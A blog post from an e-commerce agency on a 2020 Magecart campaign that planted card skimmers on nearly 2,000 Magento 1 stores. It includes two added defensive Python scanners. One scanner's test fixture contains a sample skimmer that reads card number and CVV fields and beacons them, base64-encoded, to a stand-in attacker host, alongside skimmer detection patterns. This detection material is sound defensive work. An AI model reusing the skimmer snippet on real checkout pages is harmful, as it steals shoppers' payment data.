Not to Say We Told You So… 2000 Magento Stores Hacked In The Largest-Ever Magecart Campaign

21 Sep 2020
Mike Patel

Sites still using the Magento 1 platform just got a serious wakeup call.

Sansec recently reported that nearly 2000 Magento stores were hacked over a single weekend. Sansec's early breach detection system, which monitors the e-commerce space for security threats, found 1904 Magento stores with a payment skimmer (malicious JavaScript that captures what customers type into the checkout form) on their checkout pages.

The attackers targeted the stores with a Magecart skimmer to steal the card details of customers. Sansec estimates that tens of thousands of customers had their private information stolen over the weekend while shopping at one of the compromised stores.

Cause of Attack?

This automated campaign is the largest Magecart attack Sansec has seen since it started monitoring in 2015. It followed the typical Magecart pattern: malicious JavaScript injected into the store intercepts the payment details customers enter at checkout and quietly logs them for the attackers. Starting from 10 infected stores, the trouble spread faster than a California wildfire.
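As an added illustration (not Sansec's detection system, and not code from this post or from Magento), the following Python script shows the kind of check a merchant can run against their own checkout page. It parses the HTML, flags external scripts loaded from hosts that are not on a store-specific allowlist, and flags inline scripts that combine several skimmer traits at once: hooking the checkout submission, reading card fields, encoding a payload, and shipping it to a third party. The allowlisted hosts, the sample pages and the attacker domain are all constructed for this example.

```python
"""Scan a checkout page's HTML for Magecart-style skimmer indicators.

Added example, not Sansec's scanner and not Magento or ioVista code.
Every <script> must either load from an allowlisted host or, if inline,
avoid combining the patterns skimmers need (card-field access, payload
encoding, and exfiltration to a third party).
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a hypothetical store legitimately loads scripts from (assumption for
# this example; a real store derives this from its own deployed theme).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "js.stripe.com"}

# Traits commonly seen together in skimmers.
INDICATORS = {
    "hooks_submit": re.compile(r"addEventListener\(\s*['\"](submit|click)['\"]", re.I),
    "reads_card_fields": re.compile(r"(cc_number|cc_cid|cc_exp|card[_-]?number|cvv|cvc)", re.I),
    "encodes_payload": re.compile(r"\b(btoa|atob|fromCharCode|unescape)\s*\(", re.I),
    "exfiltrates": re.compile(r"(new\s+Image\(|sendBeacon\(|fetch\(|XMLHttpRequest)", re.I),
}


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_checkout_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (kind, detail) findings; an empty list means clean."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname
        # Relative URLs (no host) are served by the store itself.
        if host and host not in allowed_hosts:
            findings.append(("unexpected_script_host", host))
    for body in collector.inline:
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(body))
        # One trait (a submit handler, say) is normal checkout code; a skimmer
        # has to read, encode and exfiltrate, so require three or more together.
        if len(hits) >= 3:
            findings.append(("inline_skimmer_indicators", ",".join(hits)))
    return findings


# Constructed sample: a benign checkout page, then the same page with an
# injected skimmer and a loader pulled from an attacker-controlled host.
CLEAN_PAGE = """<html><body>
<form id="co-payment-form">
 <input name="payment[cc_number]"><input name="payment[cc_cid]">
</form>
<script src="/js/varien/form.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script>
 document.getElementById('co-payment-form')
   .addEventListener('submit', function(){ validateForm(); });
</script>
</body></html>"""

INFECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<script src="https://cdn.static-cache.example.net/jquery.min.js"></script>
<script>
 document.querySelector('button.btn-checkout').addEventListener('click', function(){
   var d = {n: document.querySelector('[name="payment[cc_number]"]').value,
            c: document.querySelector('[name="payment[cc_cid]"]').value};
   new Image().src = 'https://cdn.static-cache.example.net/g.gif?q=' + btoa(JSON.stringify(d));
 });
</script>
</body>""")

if __name__ == "__main__":
    print("clean:", scan_checkout_html(CLEAN_PAGE))
    print("infected:", scan_checkout_html(INFECTED_PAGE))
```

Run it against the HTML your checkout page actually serves to a browser (after any server-side includes), not against the template on disk: skimmers are routinely appended to files that look legitimate on disk and only reveal themselves in the rendered page. Treat any unknown script host as a finding to investigate, even if the inline heuristic stays quiet.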

Sansec found the following data during its monitoring phase:

  • 10 stores got infected on Friday (11th September)
  • 1058 on Saturday (12th September)
  • 602 on Sunday (13th September), and
  • 233 on Monday (14th September).

The scale of this campaign shows how much web skimming has matured, and how profitable it has become: criminals are automating their operations to push skimmers onto as many stores as possible.

No History of Breaches

According to Sansec, many of the victimized stores had no history of security incidents, which suggests that a new attack method was used to gain server (write) access to all of them.

The inspected stores were found running Magento 1, which reached its End-of-Life on June 30, 2020. It didn't take long for the Black Hats to walk into sites that had left their doors unlocked.

Magento 1 Zero-day Vulnerability

While Sansec is still investigating the exact vector, the campaign may be related to a Magento 1 zero-day exploit that was put up for sale a few weeks earlier on a hacking forum. A user with the handle "z3r0day" offered a Magento 1 remote code execution exploit, complete with an instruction video, for $5,000.

To sweeten the deal, he pledged to sell only 10 copies, and claimed that no admin rights are required to inject code into a store's JS files. Hey, he was only looking to make $50k by letting hackers rob customers blind.

Nice guy, right?
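The seller's claim that the exploit writes into a store's JS files without an admin account, together with Sansec's observation that the attackers needed server write access, points at a check a merchant can run whatever the exact vector turns out to be: compare the hashes of the deployed files against a known-good baseline. The Python below is an added example (not Magento, Sansec or ioVista code); the directory layout, file contents and injected lines are constructed to resemble a Magento 1 install and are not taken from any real incident.

```python
"""Detect tampered or added files under a store's web root by comparing
SHA-256 hashes against a trusted baseline.

Added example, not Magento, Sansec or ioVista code. A skimmer appended to a
deployed .js file changes that file's hash; a dropped loader shows up as a
path with no baseline entry at all.
"""
import hashlib
import os
import tempfile


def hash_tree(root, suffixes=(".js", ".phtml", ".php")):
    """Map relative path -> sha256 hex digest for files under root with a given suffix."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(suffixes):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                out[rel] = hashlib.sha256(fh.read()).hexdigest()
    return out


def diff_against_baseline(baseline, current):
    """Return sorted lists of modified, added and missing paths."""
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(p for p in current if p not in baseline)
    missing = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "missing": missing}


def demo():
    """Build a constructed Magento-1-like tree, baseline it, simulate an
    injection into a shipped JS file plus a dropped file, and diff."""
    with tempfile.TemporaryDirectory() as root:
        # Constructed stand-ins for files a Magento 1 theme would ship.
        files = {
            "js/varien/form.js": b"VarienForm.prototype.validate = function(){ /* ... */ };\n",
            "skin/frontend/base/default/js/opcheckout.js": b"var Checkout = Class.create();\n",
            "app/design/frontend/base/default/template/checkout/onepage.phtml":
                b'<div id="checkout"></div>\n',
        }
        for rel, body in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)

        baseline = hash_tree(root)  # in practice: taken from a clean deployment

        # Simulated compromise (constructed): skimmer loader appended to a
        # legitimate file, plus a new file dropped into a normally static dir.
        with open(os.path.join(root, "js", "varien", "form.js"), "ab") as fh:
            fh.write(b"eval(atob('...'));\n")
        with open(os.path.join(root, "js", "varien", "cc_helper.js"), "wb") as fh:
            fh.write(b"/* not part of Magento */\n")

        return diff_against_baseline(baseline, hash_tree(root))


if __name__ == "__main__":
    print(demo())
```

Take the baseline from a clean extract of the same Magento release plus your own theme and extensions, keep it somewhere the web server cannot write to, and run the comparison on a schedule. Any change under js/, skin/ or app/design that you did not deploy yourself deserves a look, and a diff that comes back clean does not prove the checkout page is clean: code can also be injected through the database or through a third-party script, which is why the page itself needs checking too.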

What made Magento Stores Vulnerable?

Sansec's inspection shows that the hacked stores were still running Magento 1. Magento ended support for the Magento 1.x platform on June 30, 2020: no more bug fixes and no more security patches.

Customers Had an Early Heads-Up…Really Early

After Magento 2 was released in November 2015, Magento committed to supporting Magento 1.x for 36 months and later extended that to 55 months. Throughout that period, Magento urged merchants to migrate to the Magento 2 platform before support ended.

Visa and PayPal also warned Magento 1 merchants to migrate to Magento 2 or another e-commerce platform before Magento stopped shipping security patches and bug fixes.

It's high time for merchants still running their e-commerce stores on Magento 1.x to make the switch. Don't join the list of stores that leave their customers open to fraud: migrate your Magento store before it's compromised.

Mike Patel

Mike Patel is the Founder and CEO of ioVista, a leading digital commerce agency specializing in eCommerce solutions. With a strong background in business and technology, Mike Patel has been at the forefront of driving digital transformations for businesses. He has successfully navigated the ever-changing landscape of eCommerce, helping companies leverage the power of online platforms to grow their brand, increase revenues, and optimize their digital presence. Under his leadership, ioVista has become a trusted partner with major technology companies: Adobe/Magento, Google, BigCommerce, Shopify, and Yahoo. He is dedicated to staying ahead of industry trends, adopting cutting-edge technologies, and continuously improving strategies to provide clients with a competitive edge. Mike’s commitment to excellence and client satisfaction is evident in every project ioVista undertakes.
